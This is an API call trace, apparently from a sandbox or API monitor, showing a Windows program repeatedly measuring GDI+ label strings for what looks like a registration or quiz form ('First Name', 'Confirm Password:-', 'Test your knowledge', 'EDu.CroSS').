[0127.614] GdipSetStringFormatHotkeyPrefix (format=0x657fe68, hotkeyPrefix=1) returned 0x0
[0127.615] GetLastError () returned 0x0
[0127.615] GdipGetStringFormatFlags (format=0x657fe68, flags=0x19dbe8) returned 0x0
[0127.615] GetLastError () returned 0x0
[0127.615] GdipSetStringFormatFlags (format=0x657fe68, flags=2048) returned 0x0
[0127.615] GetLastError () returned 0x0
[0127.615] GdipMeasureString (graphics=0x657fb88, string="Last Name", length=9, font=0x657f458, layoutRect=0x19dbe4, stringFormat=0x657fe68, boundingBox=0x19dbd4, codepointsFitted=0x19dbd0, linesFilled=0x19dbcc) returned 0x0
[0127.615] GetLastError () returned 0x0
[0127.615] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0127.615] GetLastError () returned 0x0
[0127.615] GdipDeleteStringFormat (format=0x657fe68) returned 0x0
[0127.615] GetLastError () returned 0x0
[0127.615] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0127.615] GetLastError () returned 0x0
[0127.615] GdipDeleteGraphics (graphics=0x657fb88) returned 0x0
[0127.615] GetLastError () returned 0x0
[0127.615] AdjustWindowRectEx (in: lpRect=0x19dc08, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dc08) returned 1
[0127.615] GetCurrentThreadId () returned 0x600
[0127.615] GetCurrentThreadId () returned 0x600
[0127.615] GdipCreateFromHDC (hdc=0x380106da, graphics=0x19dc04) returned 0x0
[0127.616] GetLastError () returned 0x0
[0127.616] GdipCreateStringFormat (formatAttributes=0, language=0x0, format=0x27875ec) returned 0x0
[0127.616] GetLastError () returned 0x0
[0127.616] GdipSetStringFormatAlign (format=0x657fe68, align=0x0) returned 0x0
[0127.616] GetLastError () returned 0x0
[0127.616] GdipSetStringFormatLineAlign (format=0x657fe68, align=0x0) returned 0x0
[0127.616] GetLastError () returned 0x0
[0127.616] GdipSetStringFormatHotkeyPrefix (format=0x657fe68, hotkeyPrefix=1) returned 0x0
[0127.616] GetLastError () returned 0x0
[0127.616] GdipGetStringFormatFlags (format=0x657fe68, flags=0x19dbe8) returned 0x0
[0127.616] GetLastError () returned 0x0
[0127.616] GdipSetStringFormatFlags (format=0x657fe68, flags=2048) returned 0x0
[0127.616] GetLastError () returned 0x0
[0127.616] GdipMeasureString (graphics=0x657fb88, string="Middle Name", length=11, font=0x657f430, layoutRect=0x19dbe4, stringFormat=0x657fe68, boundingBox=0x19dbd4, codepointsFitted=0x19dbd0, linesFilled=0x19dbcc) returned 0x0
[0127.616] GetLastError () returned 0x0
[0127.616] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0127.616] GetLastError () returned 0x0
[0127.616] GdipDeleteStringFormat (format=0x657fe68) returned 0x0
[0127.616] GetLastError () returned 0x0
[0127.616] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0127.616] GetLastError () returned 0x0
[0127.616] GdipDeleteGraphics (graphics=0x657fb88) returned 0x0
[0127.616] GetLastError () returned 0x0
[0127.616] AdjustWindowRectEx (in: lpRect=0x19dc08, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dc08) returned 1
[0127.616] GetCurrentThreadId () returned 0x600
[0127.616] GetCurrentThreadId () returned 0x600
[0127.616] GdipCreateFromHDC (hdc=0x380106da, graphics=0x19dc04) returned 0x0
[0127.617] GetLastError () returned 0x0
[0127.617] GdipCreateStringFormat (formatAttributes=0, language=0x0, format=0x2787748) returned 0x0
[0127.617] GetLastError () returned 0x0
[0127.617] GdipSetStringFormatAlign (format=0x657fe68, align=0x0) returned 0x0
[0127.617] GetLastError () returned 0x0
[0127.617] GdipSetStringFormatLineAlign (format=0x657fe68, align=0x0) returned 0x0
[0127.617] GetLastError () returned 0x0
[0127.617] GdipSetStringFormatHotkeyPrefix (format=0x657fe68, hotkeyPrefix=1) returned 0x0
[0127.617] GetLastError () returned 0x0
[0127.617] GdipGetStringFormatFlags (format=0x657fe68, flags=0x19dbe8) returned 0x0
[0127.617] GetLastError () returned 0x0
[0127.617] GdipSetStringFormatFlags (format=0x657fe68, flags=2048) returned 0x0
[0127.617] GetLastError () returned 0x0
[0127.617] GdipMeasureString (graphics=0x657fb88, string="First Name", length=10, font=0x657f408, layoutRect=0x19dbe4, stringFormat=0x657fe68, boundingBox=0x19dbd4, codepointsFitted=0x19dbd0, linesFilled=0x19dbcc) returned 0x0
[0127.617] GetLastError () returned 0x0
[0127.618] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0127.618] GetLastError () returned 0x0
[0127.618] GdipDeleteStringFormat (format=0x657fe68) returned 0x0
[0127.618] GetLastError () returned 0x0
[0127.618] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0127.618] GetLastError () returned 0x0
[0127.618] GdipDeleteGraphics (graphics=0x657fb88) returned 0x0
[0127.618] GetLastError () returned 0x0
[0127.618] AdjustWindowRectEx (in: lpRect=0x19dc08, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dc08) returned 1
[0127.618] GetCurrentThreadId () returned 0x600
[0127.618] GetCurrentThreadId () returned 0x600
[0127.618] GdipCreateFromHDC (hdc=0x380106da, graphics=0x19dc04) returned 0x0
[0127.618] GetLastError () returned 0x0
[0127.618] GdipCreateStringFormat (formatAttributes=0, language=0x0, format=0x27878a4) returned 0x0
[0127.618] GetLastError () returned 0x0
[0127.618] GdipSetStringFormatAlign (format=0x657fe68, align=0x0) returned 0x0
[0127.618] GetLastError () returned 0x0
[0127.618] GdipSetStringFormatLineAlign (format=0x657fe68, align=0x0) returned 0x0
[0127.618] GetLastError () returned 0x0
[0127.618] GdipSetStringFormatHotkeyPrefix (format=0x657fe68, hotkeyPrefix=1) returned 0x0
[0127.618] GetLastError () returned 0x0
[0127.618] GdipGetStringFormatFlags (format=0x657fe68, flags=0x19dbe8) returned 0x0
[0127.618] GetLastError () returned 0x0
[0127.618] GdipSetStringFormatFlags (format=0x657fe68, flags=2048) returned 0x0
[0127.619] GetLastError () returned 0x0
[0127.619] GdipMeasureString (graphics=0x657fb88, string="Username:-", length=10, font=0x657f3e0, layoutRect=0x19dbe4, stringFormat=0x657fe68, boundingBox=0x19dbd4, codepointsFitted=0x19dbd0, linesFilled=0x19dbcc) returned 0x0
[0127.619] GetLastError () returned 0x0
[0127.619] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0127.619] GetLastError () returned 0x0
[0127.619] GdipDeleteStringFormat (format=0x657fe68) returned 0x0
[0127.619] GetLastError () returned 0x0
[0127.619] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0127.619] GetLastError () returned 0x0
[0127.619] GdipDeleteGraphics (graphics=0x657fb88) returned 0x0
[0127.619] GetLastError () returned 0x0
[0127.619] AdjustWindowRectEx (in: lpRect=0x19dc08, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dc08) returned 1
[0127.619] GetCurrentThreadId () returned 0x600
[0127.620] GetCurrentThreadId () returned 0x600
[0127.620] GdipCreateFromHDC (hdc=0x380106da, graphics=0x19dc04) returned 0x0
[0127.620] GetLastError () returned 0x0
[0127.620] GdipCreateStringFormat (formatAttributes=0, language=0x0, format=0x2787a00) returned 0x0
[0127.620] GetLastError () returned 0x0
[0127.620] GdipSetStringFormatAlign (format=0x657fe68, align=0x0) returned 0x0
[0127.620] GetLastError () returned 0x0
[0127.620] GdipSetStringFormatLineAlign (format=0x657fe68, align=0x0) returned 0x0
[0127.620] GetLastError () returned 0x0
[0127.620] GdipSetStringFormatHotkeyPrefix (format=0x657fe68, hotkeyPrefix=1) returned 0x0
[0127.620] GetLastError () returned 0x0
[0127.620] GdipGetStringFormatFlags (format=0x657fe68, flags=0x19dbe8) returned 0x0
[0127.620] GetLastError () returned 0x0
[0127.620] GdipSetStringFormatFlags (format=0x657fe68, flags=2048) returned 0x0
[0127.620] GetLastError () returned 0x0
[0127.620] GdipMeasureString (graphics=0x657fb88, string="Mobile Number:-", length=15, font=0x657f3b8, layoutRect=0x19dbe4, stringFormat=0x657fe68, boundingBox=0x19dbd4, codepointsFitted=0x19dbd0, linesFilled=0x19dbcc) returned 0x0
[0127.620] GetLastError () returned 0x0
[0127.620] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0127.620] GetLastError () returned 0x0
[0127.620] GdipDeleteStringFormat (format=0x657fe68) returned 0x0
[0127.620] GetLastError () returned 0x0
[0127.620] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0127.620] GetLastError () returned 0x0
[0127.621] GdipDeleteGraphics (graphics=0x657fb88) returned 0x0
[0127.621] GetLastError () returned 0x0
[0127.621] AdjustWindowRectEx (in: lpRect=0x19dc08, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dc08) returned 1
[0127.621] GetCurrentThreadId () returned 0x600
[0127.621] GetCurrentThreadId () returned 0x600
[0127.621] GdipCreateFromHDC (hdc=0x380106da, graphics=0x19dc04) returned 0x0
[0127.621] GetLastError () returned 0x0
[0127.621] GdipCreateStringFormat (formatAttributes=0, language=0x0, format=0x2787b5c) returned 0x0
[0127.621] GetLastError () returned 0x0
[0127.621] GdipSetStringFormatAlign (format=0x657fe68, align=0x0) returned 0x0
[0127.621] GetLastError () returned 0x0
[0127.621] GdipSetStringFormatLineAlign (format=0x657fe68, align=0x0) returned 0x0
[0127.621] GetLastError () returned 0x0
[0127.621] GdipSetStringFormatHotkeyPrefix (format=0x657fe68, hotkeyPrefix=1) returned 0x0
[0127.621] GetLastError () returned 0x0
[0127.621] GdipGetStringFormatFlags (format=0x657fe68, flags=0x19dbe8) returned 0x0
[0127.621] GetLastError () returned 0x0
[0127.622] GdipSetStringFormatFlags (format=0x657fe68, flags=2048) returned 0x0
[0127.622] GetLastError () returned 0x0
[0127.622] GdipMeasureString (graphics=0x657fb88, string="Name:-", length=6, font=0x546efc0, layoutRect=0x19dbe4, stringFormat=0x657fe68, boundingBox=0x19dbd4, codepointsFitted=0x19dbd0, linesFilled=0x19dbcc) returned 0x0
[0127.622] GetLastError () returned 0x0
[0127.622] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0127.622] GetLastError () returned 0x0
[0127.622] GdipDeleteStringFormat (format=0x657fe68) returned 0x0
[0127.622] GetLastError () returned 0x0
[0127.622] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0127.622] GetLastError () returned 0x0
[0127.622] GdipDeleteGraphics (graphics=0x657fb88) returned 0x0
[0127.622] GetLastError () returned 0x0
[0127.622] AdjustWindowRectEx (in: lpRect=0x19dc08, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dc08) returned 1
[0127.891] CreateCompatibleDC (hdc=0x0) returned 0x3d0109b1
[0127.891] GetLastError () returned 0x0
[0127.903] GetDC (hWnd=0x0) returned 0xa0100d0
[0127.903] GetLastError () returned 0x0
[0127.903] GdipCreateFromHDC (hdc=0xa0100d0, graphics=0x19dbac) returned 0x0
[0127.903] GetLastError () returned 0x0
[0127.919] GdipGetLogFontW (font=0x657af30, graphics=0x657fb18, logfontW=0x73db10) returned 0x0
[0127.921] GetLastError () returned 0x0
[0127.923] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0127.923] GetLastError () returned 0x7f
[0127.923] GdipDeleteGraphics (graphics=0x657fb18) returned 0x0
[0127.923] GetLastError () returned 0x7f
[0127.923] ReleaseDC (hWnd=0x0, hDC=0xa0100d0) returned 1
[0127.923] GetLastError () returned 0x7f
[0127.925] CreateFontIndirectW (lplf=0x73db10) returned 0x350a09a6
[0127.926] GetLastError () returned 0x7f
[0127.930] SelectObject (hdc=0x3d0109b1, h=0x350a09a6) returned 0x18a0048
[0127.930] GetLastError () returned 0x7f
[0127.949] GetTextMetricsW (in: hdc=0x3d0109b1, lptm=0x19dc88 | out: lptm=0x19dc88) returned 1
[0127.949] GetLastError () returned 0x7f
[0127.949] GetTextExtentPoint32W (in: hdc=0x3d0109b1, lpString="abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ", c=52, psizl=0x279e558 | out: psizl=0x279e558) returned 1
[0127.949] GetLastError () returned 0x7f
[0127.949] SelectObject (hdc=0x3d0109b1, h=0x18a0048) returned 0x350a09a6
[0127.949] GetLastError () returned 0x7f
[0127.957] DeleteDC (hdc=0x3d0109b1) returned 1
[0127.957] GetLastError () returned 0x7f
[0127.996] AdjustWindowRectEx (in: lpRect=0x19dab4, dwStyle=0x2ce0000, bMenu=0, dwExStyle=0x50000 | out: lpRect=0x19dab4) returned 1
[0127.996] AdjustWindowRectEx (in: lpRect=0x19dc24, dwStyle=0x2ce0000, bMenu=0, dwExStyle=0x50000 | out: lpRect=0x19dc24) returned 1
[0128.008] AdjustWindowRectEx (in: lpRect=0x19da24, dwStyle=0x2ce0000, bMenu=0, dwExStyle=0x50000 | out: lpRect=0x19da24) returned 1
[0128.008] AdjustWindowRectEx (in: lpRect=0x19daf8, dwStyle=0x2ce0000, bMenu=0, dwExStyle=0x50000 | out: lpRect=0x19daf8) returned 1
[0128.010] GetSystemMetrics (nIndex=34) returned 136
[0128.010] GetSystemMetrics (nIndex=35) returned 39
[0128.015] AdjustWindowRectEx (in: lpRect=0x19dc08, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dc08) returned 1
[0128.016] AdjustWindowRectEx (in: lpRect=0x19db08, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19db08) returned 1
[0128.016] GdipCreateFromHDC (hdc=0x380106da, graphics=0x19da3c) returned 0x0
[0128.017] GetLastError () returned 0x7f
[0128.017] GdipCreateStringFormat (formatAttributes=0, language=0x0, format=0x279e5ec) returned 0x0
[0128.017] GetLastError () returned 0x7f
[0128.017] GdipSetStringFormatAlign (format=0x657fe68, align=0x0) returned 0x0
[0128.017] GetLastError () returned 0x7f
[0128.017] GdipSetStringFormatLineAlign (format=0x657fe68, align=0x0) returned 0x0
[0128.017] GetLastError () returned 0x7f
[0128.017] GdipSetStringFormatHotkeyPrefix (format=0x657fe68, hotkeyPrefix=1) returned 0x0
[0128.017] GetLastError () returned 0x7f
[0128.017] GdipGetStringFormatFlags (format=0x657fe68, flags=0x19da20) returned 0x0
[0128.017] GetLastError () returned 0x7f
[0128.017] GdipSetStringFormatFlags (format=0x657fe68, flags=2048) returned 0x0
[0128.017] GetLastError () returned 0x7f
[0128.017] GdipMeasureString (graphics=0x657fb88, string="All fields are mandatory", length=24, font=0x657f610, layoutRect=0x19da1c, stringFormat=0x657fe68, boundingBox=0x19da0c, codepointsFitted=0x19da08, linesFilled=0x19da04) returned 0x0
[0128.017] GetLastError () returned 0x7f
[0128.017] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0128.017] GetLastError () returned 0x7f
[0128.017] GdipDeleteStringFormat (format=0x657fe68) returned 0x0
[0128.017] GetLastError () returned 0x7f
[0128.017] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0128.017] GetLastError () returned 0x7f
[0128.017] GdipDeleteGraphics (graphics=0x657fb88) returned 0x0
[0128.017] GetLastError () returned 0x7f
[0128.018] AdjustWindowRectEx (in: lpRect=0x19dc08, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dc08) returned 1
[0128.018] AdjustWindowRectEx (in: lpRect=0x19db08, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19db08) returned 1
[0128.018] GdipCreateFromHDC (hdc=0x380106da, graphics=0x19da3c) returned 0x0
[0128.018] GetLastError () returned 0x7f
[0128.018] GdipCreateStringFormat (formatAttributes=0, language=0x0, format=0x279e654) returned 0x0
[0128.018] GetLastError () returned 0x7f
[0128.018] GdipSetStringFormatAlign (format=0x657fe68, align=0x0) returned 0x0
[0128.018] GetLastError () returned 0x7f
[0128.018] GdipSetStringFormatLineAlign (format=0x657fe68, align=0x0) returned 0x0
[0128.018] GetLastError () returned 0x7f
[0128.018] GdipSetStringFormatHotkeyPrefix (format=0x657fe68, hotkeyPrefix=1) returned 0x0
[0128.018] GetLastError () returned 0x7f
[0128.018] GdipGetStringFormatFlags (format=0x657fe68, flags=0x19da20) returned 0x0
[0128.019] GetLastError () returned 0x7f
[0128.019] GdipSetStringFormatFlags (format=0x657fe68, flags=2048) returned 0x0
[0128.019] GetLastError () returned 0x7f
[0128.019] GdipMeasureString (graphics=0x657fb88, string="user", length=4, font=0x657f7a0, layoutRect=0x19da1c, stringFormat=0x657fe68, boundingBox=0x19da0c, codepointsFitted=0x19da08, linesFilled=0x19da04) returned 0x0
[0128.019] GetLastError () returned 0x7f
[0128.019] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0128.019] GetLastError () returned 0x7f
[0128.019] GdipDeleteStringFormat (format=0x657fe68) returned 0x0
[0128.019] GetLastError () returned 0x7f
[0128.019] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0128.019] GetLastError () returned 0x7f
[0128.019] GdipDeleteGraphics (graphics=0x657fb88) returned 0x0
[0128.019] GetLastError () returned 0x7f
[0128.019] AdjustWindowRectEx (in: lpRect=0x19dc08, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dc08) returned 1
[0128.019] AdjustWindowRectEx (in: lpRect=0x19db08, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19db08) returned 1
[0128.019] GdipCreateFromHDC (hdc=0x380106da, graphics=0x19da3c) returned 0x0
[0128.019] GetLastError () returned 0x7f
[0128.019] GdipCreateStringFormat (formatAttributes=0, language=0x0, format=0x279e6bc) returned 0x0
[0128.019] GetLastError () returned 0x7f
[0128.019] GdipSetStringFormatAlign (format=0x657fe68, align=0x0) returned 0x0
[0128.019] GetLastError () returned 0x7f
[0128.019] GdipSetStringFormatLineAlign (format=0x657fe68, align=0x0) returned 0x0
[0128.019] GetLastError () returned 0x7f
[0128.019] GdipSetStringFormatHotkeyPrefix (format=0x657fe68, hotkeyPrefix=1) returned 0x0
[0128.019] GetLastError () returned 0x7f
[0128.019] GdipGetStringFormatFlags (format=0x657fe68, flags=0x19da20) returned 0x0
[0128.020] GetLastError () returned 0x7f
[0128.020] GdipSetStringFormatFlags (format=0x657fe68, flags=2048) returned 0x0
[0128.020] GetLastError () returned 0x7f
[0128.020] GdipMeasureString (graphics=0x657fb88, string="Test your knowledge", length=19, font=0x657f728, layoutRect=0x19da1c, stringFormat=0x657fe68, boundingBox=0x19da0c, codepointsFitted=0x19da08, linesFilled=0x19da04) returned 0x0
[0128.020] GetLastError () returned 0x7f
[0128.020] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0128.020] GetLastError () returned 0x7f
[0128.020] GdipDeleteStringFormat (format=0x657fe68) returned 0x0
[0128.020] GetLastError () returned 0x7f
[0128.020] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0128.020] GetLastError () returned 0x7f
[0128.020] GdipDeleteGraphics (graphics=0x657fb88) returned 0x0
[0128.020] GetLastError () returned 0x7f
[0128.020] AdjustWindowRectEx (in: lpRect=0x19dc08, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dc08) returned 1
[0128.020] AdjustWindowRectEx (in: lpRect=0x19db08, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19db08) returned 1
[0128.020] GdipCreateFromHDC (hdc=0x380106da, graphics=0x19da3c) returned 0x0
[0128.020] GetLastError () returned 0x7f
[0128.020] GdipCreateStringFormat (formatAttributes=0, language=0x0, format=0x279e724) returned 0x0
[0128.020] GetLastError () returned 0x7f
[0128.020] GdipSetStringFormatAlign (format=0x657fe68, align=0x0) returned 0x0
[0128.020] GetLastError () returned 0x7f
[0128.020] GdipSetStringFormatLineAlign (format=0x657fe68, align=0x0) returned 0x0
[0128.020] GetLastError () returned 0x7f
[0128.020] GdipSetStringFormatHotkeyPrefix (format=0x657fe68, hotkeyPrefix=1) returned 0x0
[0128.020] GetLastError () returned 0x7f
[0128.020] GdipGetStringFormatFlags (format=0x657fe68, flags=0x19da20) returned 0x0
[0128.020] GetLastError () returned 0x7f
[0128.020] GdipSetStringFormatFlags (format=0x657fe68, flags=2048) returned 0x0
[0128.020] GetLastError () returned 0x7f
[0128.020] GdipMeasureString (graphics=0x657fb88, string="EDu.CroSS", length=9, font=0x657f908, layoutRect=0x19da1c, stringFormat=0x657fe68, boundingBox=0x19da0c, codepointsFitted=0x19da08, linesFilled=0x19da04) returned 0x0
[0128.021] GetLastError () returned 0x7f
[0128.021] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0128.021] GetLastError () returned 0x7f
[0128.021] GdipDeleteStringFormat (format=0x657fe68) returned 0x0
[0128.021] GetLastError () returned 0x7f
[0128.021] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0128.021] GetLastError () returned 0x7f
[0128.021] GdipDeleteGraphics (graphics=0x657fb88) returned 0x0
[0128.021] GetLastError () returned 0x7f
[0128.021] AdjustWindowRectEx (in: lpRect=0x19dc08, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dc08) returned 1
[0128.021] AdjustWindowRectEx (in: lpRect=0x19db08, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19db08) returned 1
[0128.023] AdjustWindowRectEx (in: lpRect=0x19dbf8, dwStyle=0x56210242, bMenu=0, dwExStyle=0x200 | out: lpRect=0x19dbf8) returned 1
[0128.028] AdjustWindowRectEx (in: lpRect=0x19daf8, dwStyle=0x56210242, bMenu=0, dwExStyle=0x200 | out: lpRect=0x19daf8) returned 1
[0128.028] AdjustWindowRectEx (in: lpRect=0x19dc08, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dc08) returned 1
[0128.028] AdjustWindowRectEx (in: lpRect=0x19db08, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19db08) returned 1
[0128.028] AdjustWindowRectEx (in: lpRect=0x19dc08, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dc08) returned 1
[0128.028] AdjustWindowRectEx (in: lpRect=0x19db08, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19db08) returned 1
[0128.028] AdjustWindowRectEx (in: lpRect=0x19dc08, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dc08) returned 1
[0128.028] AdjustWindowRectEx (in: lpRect=0x19db08, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19db08) returned 1
[0128.028] GdipCreateFromHDC (hdc=0x380106da, graphics=0x19da3c) returned 0x0
[0128.029] GetLastError () returned 0x7f
[0128.029] GdipCreateStringFormat (formatAttributes=0, language=0x0, format=0x279e80c) returned 0x0
[0128.029] GetLastError () returned 0x7f
[0128.029] GdipSetStringFormatAlign (format=0x657fe68, align=0x0) returned 0x0
[0128.029] GetLastError () returned 0x7f
[0128.029] GdipSetStringFormatLineAlign (format=0x657fe68, align=0x0) returned 0x0
[0128.029] GetLastError () returned 0x7f
[0128.029] GdipSetStringFormatHotkeyPrefix (format=0x657fe68, hotkeyPrefix=1) returned 0x0
[0128.029] GetLastError () returned 0x7f
[0128.029] GdipGetStringFormatFlags (format=0x657fe68, flags=0x19da20) returned 0x0
[0128.029] GetLastError () returned 0x7f
[0128.029] GdipSetStringFormatFlags (format=0x657fe68, flags=2048) returned 0x0
[0128.029] GetLastError () returned 0x7f
[0128.029] GdipMeasureString (graphics=0x657fb88, string="Gender:-", length=8, font=0x657f890, layoutRect=0x19da1c, stringFormat=0x657fe68, boundingBox=0x19da0c, codepointsFitted=0x19da08, linesFilled=0x19da04) returned 0x0
[0128.029] GetLastError () returned 0x7f
[0128.029] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0128.029] GetLastError () returned 0x7f
[0128.029] GdipDeleteStringFormat (format=0x657fe68) returned 0x0
[0128.030] GetLastError () returned 0x7f
[0128.030] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0128.030] GetLastError () returned 0x7f
[0128.030] GdipDeleteGraphics (graphics=0x657fb88) returned 0x0
[0128.030] GetLastError () returned 0x7f
[0128.030] AdjustWindowRectEx (in: lpRect=0x19dc08, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dc08) returned 1
[0128.030] AdjustWindowRectEx (in: lpRect=0x19db08, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19db08) returned 1
[0128.030] GdipCreateFromHDC (hdc=0x380106da, graphics=0x19da3c) returned 0x0
[0128.030] GetLastError () returned 0x7f
[0128.030] GdipCreateStringFormat (formatAttributes=0, language=0x0, format=0x279e874) returned 0x0
[0128.030] GetLastError () returned 0x7f
[0128.030] GdipSetStringFormatAlign (format=0x657fe68, align=0x0) returned 0x0
[0128.030] GetLastError () returned 0x7f
[0128.030] GdipSetStringFormatLineAlign (format=0x657fe68, align=0x0) returned 0x0
[0128.030] GetLastError () returned 0x7f
[0128.030] GdipSetStringFormatHotkeyPrefix (format=0x657fe68, hotkeyPrefix=1) returned 0x0
[0128.030] GetLastError () returned 0x7f
[0128.030] GdipGetStringFormatFlags (format=0x657fe68, flags=0x19da20) returned 0x0
[0128.030] GetLastError () returned 0x7f
[0128.030] GdipSetStringFormatFlags (format=0x657fe68, flags=2048) returned 0x0
[0128.030] GetLastError () returned 0x7f
[0128.030] GdipMeasureString (graphics=0x657fb88, string="Age:-", length=5, font=0x657f7f0, layoutRect=0x19da1c, stringFormat=0x657fe68, boundingBox=0x19da0c, codepointsFitted=0x19da08, linesFilled=0x19da04) returned 0x0
[0128.030] GetLastError () returned 0x7f
[0128.030] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0128.030] GetLastError () returned 0x7f
[0128.030] GdipDeleteStringFormat (format=0x657fe68) returned 0x0
[0128.030] GetLastError () returned 0x7f
[0128.030] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0128.030] GetLastError () returned 0x7f
[0128.030] GdipDeleteGraphics (graphics=0x657fb88) returned 0x0
[0128.030] GetLastError () returned 0x7f
[0128.030] AdjustWindowRectEx (in: lpRect=0x19dc08, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dc08) returned 1
[0128.030] AdjustWindowRectEx (in: lpRect=0x19db08, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19db08) returned 1
[0128.030] GdipCreateFromHDC (hdc=0x380106da, graphics=0x19da3c) returned 0x0
[0128.031] GetLastError () returned 0x7f
[0128.031] GdipCreateStringFormat (formatAttributes=0, language=0x0, format=0x279e8dc) returned 0x0
[0128.031] GetLastError () returned 0x7f
[0128.031] GdipSetStringFormatAlign (format=0x657fe68, align=0x0) returned 0x0
[0128.031] GetLastError () returned 0x7f
[0128.031] GdipSetStringFormatLineAlign (format=0x657fe68, align=0x0) returned 0x0
[0128.031] GetLastError () returned 0x7f
[0128.031] GdipSetStringFormatHotkeyPrefix (format=0x657fe68, hotkeyPrefix=1) returned 0x0
[0128.031] GetLastError () returned 0x7f
[0128.031] GdipGetStringFormatFlags (format=0x657fe68, flags=0x19da20) returned 0x0
[0128.031] GetLastError () returned 0x7f
[0128.031] GdipSetStringFormatFlags (format=0x657fe68, flags=2048) returned 0x0
[0128.031] GetLastError () returned 0x7f
[0128.031] GdipMeasureString (graphics=0x657fb88, string="Confirm Password:-", length=18, font=0x657f868, layoutRect=0x19da1c, stringFormat=0x657fe68, boundingBox=0x19da0c, codepointsFitted=0x19da08, linesFilled=0x19da04) returned 0x0
[0128.031] GetLastError () returned 0x7f
[0128.031] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0128.031] GetLastError () returned 0x7f
[0128.031] GdipDeleteStringFormat (format=0x657fe68) returned 0x0
[0128.031] GetLastError () returned 0x7f
[0128.031] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0128.031] GetLastError () returned 0x7f
[0128.031] GdipDeleteGraphics (graphics=0x657fb88) returned 0x0
[0128.031] GetLastError () returned 0x7f
[0128.031] AdjustWindowRectEx (in: lpRect=0x19dc08, dwStyle=0x560100c0, bMenu=0, dwExStyle=0x200 | out: lpRect=0x19dc08) returned 1
[0128.031] AdjustWindowRectEx (in: lpRect=0x19db08, dwStyle=0x560100c0, bMenu=0, dwExStyle=0x200 | out: lpRect=0x19db08) returned 1
[0128.032] GetSystemMetrics (nIndex=5) returned 1
[0128.032] GetSystemMetrics (nIndex=6) returned 1
[0128.032] AdjustWindowRectEx (in: lpRect=0x19dc08, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dc08) returned 1
[0128.032] AdjustWindowRectEx (in: lpRect=0x19db08, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19db08) returned 1
[0128.032] GdipCreateFromHDC (hdc=0x380106da, graphics=0x19da3c) returned 0x0
[0128.032] GetLastError () returned 0x7f
[0128.032] GdipCreateStringFormat (formatAttributes=0, language=0x0, format=0x279e964) returned 0x0
[0128.032] GetLastError () returned 0x7f
[0128.032] GdipSetStringFormatAlign (format=0x657fe68, align=0x0) returned 0x0
[0128.032] GetLastError () returned 0x7f
[0128.032] GdipSetStringFormatLineAlign (format=0x657fe68, align=0x0) returned 0x0
[0128.032] GetLastError () returned 0x7f
[0128.032] GdipSetStringFormatHotkeyPrefix (format=0x657fe68, hotkeyPrefix=1) returned 0x0
